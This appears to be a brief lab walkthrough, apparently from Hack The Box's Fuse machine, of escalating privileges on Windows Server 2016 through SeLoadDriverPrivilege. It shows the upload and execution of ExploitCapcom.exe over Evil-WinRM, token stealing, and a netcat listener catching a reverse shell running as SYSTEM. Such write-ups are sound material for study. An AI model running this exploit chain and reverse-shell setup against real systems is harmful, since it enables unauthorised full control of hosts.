7 privesc SeLoadDriverPrivilege
Last updated
Last updated
*Evil-WinRM* PS C:\kashz> upload ExploitCapcom.exe
Info: Uploading ExploitCapcom.exe to C:\kashz\ExploitCapcom.exe
Data: 356352 bytes of 356352 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\kashz> .\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000080
[*] Shellcode was placed at 0000024737490008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.193] 52732
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\kashz>whoami
whoami
nt authority\system
C:\kashz>systeminfo
Host Name: FUSE
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393